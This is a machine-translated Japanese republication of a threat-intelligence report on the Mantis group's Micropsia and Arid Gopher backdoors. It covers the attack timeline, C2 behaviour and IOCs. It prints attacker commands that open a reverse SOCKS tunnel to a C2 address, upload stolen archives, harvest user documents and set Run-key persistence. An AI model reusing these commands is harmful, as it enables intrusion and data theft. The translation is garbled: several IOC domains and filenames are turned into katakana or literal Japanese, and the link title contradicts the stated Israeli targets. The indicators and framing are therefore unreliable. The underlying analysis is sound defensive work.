背景
Mantis は 2014 年から活動しており、一部のサードパーティのレポートによると、2011 年には活動していた可能性があります。このグループは、イスラエルや他の多くの中東諸国の組織をターゲットにしていることで知られています。対象となる分野には政府、軍事、金融、メディア、教育、エネルギー、シンクタンクなどが含まれる。このグループは、フィッシングメールと偽のソーシャルメディアプロファイルを使用してターゲットを騙し、デバイスにマルウェアをインストールさせることで知られています。
カマキリはパレスチナ領土と関係があると広く信じられている。シマンテックはパレスチナ組織への帰属を明確にすることができなかったが、他のベンダーはパレスチナ組織をハマスと結びつけていた。
最新の攻撃では、同グループはカスタムの Micropsia および Arid Gopher バックドアの最新バージョンを使用してターゲットを感染させ、その後、大規模な資格情報の盗難と盗まれたデータの流出を行いました。
攻撃チェーン
この事件の最初の感染経路は不明です。標的となったある組織では、攻撃者は同じツールセットの 3 つの異なるバージョン (つまり、同じツールの異なるバリエーション) を 3 つのコンピュータ グループに展開しました。この方法で攻撃を隔離することは、おそらく予防策です。これらのツールセットのいずれかが発見された場合でも、攻撃者はターゲット ネットワーク上で永続的な存在を維持できます。
以下に、3 つのツールセットのうちの 1 つの使用法を説明します。
悪意のあるアクティビティは、2022 年 12 月 18 日に初めて検出されました。難読化された PowerShell コマンドの 3 つの別々のセットが実行され、埋め込みシェルコードを起動する Base64 でエンコードされた文字列が読み込まれました。シェルコードは、基本的な TCP プロトコルを使用してコマンド アンド コントロール (C&C) サーバー (104.194.222[.]50 ポート 4444) から別のステージをダウンロードする 32 ビット ブートローダーです。
攻撃者は 12 月 19 日に再び攻撃し、最初に資格情報ダンプを実行し、次に Certutil と BITSAdmin を使用して Micropsia バックドアと一般公開されている SSH クライアントである Putty をダウンロードしました。
その後、Micropsia が実行され、C&C サーバーとの接続が開始されます。同日、Micropsia は同じ組織内の他の 3 台のマシンでも処刑されました。いずれの場合も、ファイル名にちなんで名付けられたフォルダー内で実行されます。
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
コンピューターでは、Micropsia を使用して外部 IP アドレスへのリバース ソックス トンネルを設定します。
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [編集済み]
12 月 20 日、Micropsia は、感染したコンピュータの 1 台で windowspackages.exe と呼ばれる未知の実行可能ファイルを実行するために使用されました。
翌日の 12 月 21 日、RAR が実行され、別の感染したコンピュータ上でファイルがアーカイブされました。
12 月 22 日から 2023 年 1 月 2 日まで、Micropsia は 3 台の感染したコンピューターで Arid Gopher バックドアを実行するために使用されました。次に、Arid Gopher は SetRegRunKey.exe というツールを実行するために使用されます。このツールは、再起動後も実行するようにレジストリに Arid Gopher を追加することで永続性を提供します。また、localsecuritypolicy.exe という未知のファイルも実行されました (攻撃者はこのファイル名を Arid Gopher バックドアとして別の場所で使用しました)。
12 月 28 日、Micropsia はさらに 3 台の感染したコンピュータで windowspackages.exe を実行するために使用されました。
12 月 31 日、Arid Gopher は、感染した 2 台のコンピュータ上で networkwitcherdatamodell.exe および networkuefidiagsbootserver.exe という名前の 2 つの未知のファイルを実行しました。
攻撃者は 1 月 2 日までに、使用していたバージョンの Arid Gopher を無効化し、新しい亜種を導入しました。これは最初のバージョンが発見されたためでしょうか、それとも標準的な操作手順が不明瞭だからでしょうか。
1 月 4 日、Micropsia は、1 台のコンピューター上の csidl_common_appdata\hostupbroker\hostupbroker.exe フォルダーにある 2 つの未知のファイル (どちらも hostupbroker.exe という名前) を実行するために使用されました。これに続いて、RAR ファイルが漏洩します。
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
1 月 9 日、Arid Gopher が 1 台のコンピューター上で 2 つの未知のファイルを実行するために使用されました。
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe
最後の悪意のあるアクティビティは 1 月 12 日以降に発生し、Arid Gopher が 10 時間ごとに localsecuritypolicy.exe という名前の未知のファイルを実行するために使用されました。
小視症
これらの攻撃に使用された Micropsia バックドアの亜種は、他のベンダーが確認したバージョンをわずかに更新したものと思われます。このイベントでは、Micropsia は複数のファイル名とファイル パスを使用してデプロイしました。
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia は WMI を使用して実行され、その主な目的は攻撃者のセカンダリ ペイロードを実行することであるようです。これらには次のものが含まれます。
Arid Gopher (ファイル名: networkvirtualizationstartservice.exe、networkvirtualizationfiaservice.exe、networkvirtualizationseoservice.exe)
リバース SOCK トンネラー (別名 Revsocks) (ファイル名: windowsservicemanageav.exe)
データ抽出ツール(ファイル名:windowsupserv.exe)
2 つの不明なファイル (両方とも hostupbroker.exe という名前)
windowspackages.exe という名前の不明なファイル
これに加えて、Micropsia には、スクリーンショット、キーロギング、データ漏洩に備えて特定のファイル タイプをアーカイブするための WinRAR の使用などの独自の機能があります。
"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" ar -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PRO GRAMDATA% \Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” ” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILE%*.pdf” “%USERPROFILE%*.ppt” “%USERPROF” ILE %*.pptx」「%USERPROFILE%*.odt」 「%USERPROFILE% *.mdb」 「%USERPROFILE%*.accdb」 「%USERPROFILE%*.accde」 「%USERPROFILE%*.txt」 「%USERPROFILE%*.rtf」 「%USERPROFILE%*.vcf」
乾燥ホリネズミ
Arid Gopher は Delphi で書かれた Micropsia とは異なり、Go 言語で書かれています。このイベントで使用された Arid Gopher のバージョンには、次の組み込みコンポーネントが含まれています。
7za.exe – 正規の 7-Zip 実行可能ファイルのコピー
AttestationWmiProvider.exe – 「run」レジストリ値を設定するツール
ServiceHubIdentityHost.exe – Optimum X の正規の Shortcut.exe 実行可能ファイルのコピー
Setup.env – 構成ファイル
Arid Gopher は、未知のファイル networkwitcherdatamodell.exe、localsecuritypolicy.exe、networkuefidiagsbootserver.exe の起動にも使用され、さらに、PyArmor を使用して難読化されたファイルのダウンロードと実行にも使用されました。
C&C サーバーと通信するとき、Arid Gopher はデバイスを 1 つのパスに登録し、おそらくコマンドを受信するために別のパスに接続します。
接続先: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – おそらくデバイスを登録します
次は http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – おそらくコマンドを受信するためのものです。
接続先: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – おそらくデバイスを登録するため
次は http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – おそらくコマンドを受信するためです
Arid Gopher は攻撃者によって定期的に更新および書き換えられているようで、検出を回避している可能性が最も高くなります。このマルウェアの亜種の 1 つは、以前のバージョンの一意のコードとは大きく異なり、以前のバージョンと同じ一意のコードを含むサブルーチンは存在しません。 Mantis はバリアント間でロジックを積極的にシフトしているようですが、これを手動で行うと時間のかかる操作になります。
| 指示 | 説明 |
|---|---|
| 「c」 | おそらく main.exC("cmd") に関連していると思われます |
| 「d」 | おそらく main.down2 に関連していると思われます |
| 「す」 | おそらく main.OnDSH に関連していると思われます |
| 「シ」 | おそらく main.deviceProperties に関連していると思われます |
| 「追伸」 | おそらく main.exC("powershell") に関連していると思われます |
| 「ら」 | おそらく main.RunAWithoutW に関連しています |
| 「SF」 | おそらく main.updateSettings に関連していると思われます |
| 「SL」 | おそらく main.searchForLogs に関連していると思われます |
| 「うー」 | おそらく main.updateApp に関連していると思われます |
| 「うーん」 | おそらく main.updateT に関連していると思われます |
| 「pwnr」 | おそらく main.exCWithoutW("powershell") に関連していると思われます |
| 「ラップ」 | おそらく main.restartApp に関連していると思われます |
| 「ゲログ」 | おそらく main.upAppLogs に関連していると思われます |
| 「うふふ」 | おそらく main.collectFi に関連していると思われます |
| 「ウフォフド」 | おそらく main.collectFiOrFol に関連していると思われます |
| 「bwp」 | おそらく main.browDat に関連していると思われます |
| 「cbh」 | おそらく main.delBD に関連していると思われます |
| 「CWR」 | おそらく main.exCWithoutW("cmd") に関連しています |
| 「ガフ」 | おそらく main.collectFi に関連していると思われます |
| 「ntf」 | おそらく main.collectNet に関連する |
| 「スムル」 | おそらく main.updateSettings に関連していると思われます |
埋め込まれた setup.env ファイルは、分析された Arid Gopher バリアントによって構成データを取得するために使用され、次のコンテンツが含まれています。
DIR=WindowsPerceptionService
エンドポイント=http://jumpstartmail[.]com/IURTIER3BNV4ER
ログ=logs.txt
DID=コード.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
COMPRESSOR=7za.exe
DDIR=リソースファイル
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe
setup.env 構成ファイルには、同じく Arid Gopher に埋め込まれている別のファイル AttestationWmiProvider.exe が記載されています。このファイルはヘルパーとして機能する 32 ビットの実行可能ファイルであり、再起動時に別の実行可能ファイルが確実に実行されるようにします。実行時に、次のコマンド ライン パラメータがチェックされます。
「key」と文字列パラメータ [RUN_VALUE_NAME]
「値」と文字列パラメータ [RUN_PATHNAME]
次に、 func os/signal.Notify() を使用してシグナル通知を受信するように手配します。通知されると、次のレジストリ値が設定されます。
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”[RUN_VALUE_NAME]” = “[RUN_PATHNAME]”
これまでの調査では、このファイルが再起動時に Arid Gopher を実行するように設定されていることがわかっています。
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService “-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x”
データ侵害ツール
攻撃者はまた、カスタム ツール (WindowsUpServ.exe という名前の 64 ビット PyInstaller 実行可能ファイル) を使用して、標的の組織から盗んだデータを抽出しました。ツールを実行すると、次のコマンド ライン パラメーターがチェックされます。
「-d」「[FILE_DIRECTORY]」
"-f" "[ファイル名]"
「-f」「[FILENAME]」コマンド ライン引数ごとに、ツールは [FILENAME] の内容をアップロードします。 「-d」「[FILE_DIRECTORY]」コマンド ライン引数ごとに、ツールはフォルダー [FILE_DIRECTORY] に保存されているファイルのリストを取得し、各ファイルのコンテンツをアップロードします。
各ファイルがアップロードされると、ツールは次のパラメータを使用して HTTP POST リクエストを C&C サーバーに送信します。
"kjdfnqweb": [THE_FILE_CONTENT]
"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]
リモート サーバーがステータス コード 200 で応答するたびに、マルウェアはアップロードされたファイルをローカル ディスクから削除します。マルウェアは、その動作の一部を次のファイルに記録する場合もあります。
「C:\ProgramData\WindowsUpServ\success.txt」
「C:\ProgramData\WindowsUpServ\err.txt」
頑固な相手
Mantis は、大規模なマルウェアの書き換えと、個々の組織に対する攻撃を別々の部分に分割して操作全体の検出を減らしていることからわかるように、成功の可能性を最大化するために時間と労力を惜しみなく投資する断固たる敵対者であるようです。見られる。
IOCインジケーター
| SHA256ハッシュ | ファイル名 | 説明 |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | ネットワーク仮想化サービス.exe | 乾燥ホリネズミ |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | ネットワーク仮想化picservice.exe | 乾燥ホリネズミ |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | networkvirtualizationfiaservice.exe | 乾燥ホリネズミ |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualizationinithservice.exe | 乾燥ホリネズミ |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | 乾燥ホリネズミ |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | networkvirtualizationstartservice.exe | 乾燥ホリネズミ |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | Arid Gopher 永続化コンポーネント |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | ウィンドウズアップサーブ.exe | 抽出ツール |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | ウィンドウズアップサーブ.exe | 抽出ツール |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | 様々な | 小視症 |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | 該当なし | 小視症 |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | 小視症 |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | システムプロパティ国際時間.exe | 小視症 |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | networkvirtualizationseoservice.exe | 乾燥ホリネズミの可能性 |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | 可能なメーターメーター |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | システムプロパティ国際時間.exe | 小視症の可能性 |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | リバースソックストンネル |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | 該当なし | シェルコード |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | 該当なし | シェルコード |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | 該当なし | シェルコード |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemPropertiesInternationalTime.rar | 不明なファイル |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | ネットワークスイッチャーデータモデル.exe | 不明なファイル |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | 不明なファイル |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | 不明なファイル |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | 不明なファイル |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | 不明なファイル |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | 埋め込みモードサービス.exe | 不明なファイル |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | ローカルセキュリティポリシー.exe | 不明なファイル |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | 埋め込みモードサービス.exe | 不明なファイル |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | ローカルセキュリティポリシー.exe | 不明なファイル |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | 不明なファイル |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | チームビューアリモートサービス.exe | 不明なファイル |
| ジャンプスタートメール[.]com | 乾燥ゴーファー C&C | |
| ペイデイローン新しい[.]com | 乾燥ゴーファー C&C | |
| ピクチャーワールド[.]情報 | 乾燥ゴーファー C&C | |
| rnacgroup[.]com | C&C | |
| サリマフィア[.]ネット | 乾燥ゴーファー C&C | |
| ソモイネット | 乾燥ゴーファー C&C | |
| ソフトユーティリティ[.]com | C&C | |
| クロエ・ボアマン[.]com | 小視症C&C | |
| クリストン・コール[.]com | 小視症C&C | |
| http://5.182.39[.]44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu | 抽出ツール C&C |
元記事はChief Security Officerによるもので、転載の際はhttps://cncso.com/jp/パレスチナ人標的への攻撃に使われたマンティス-h。
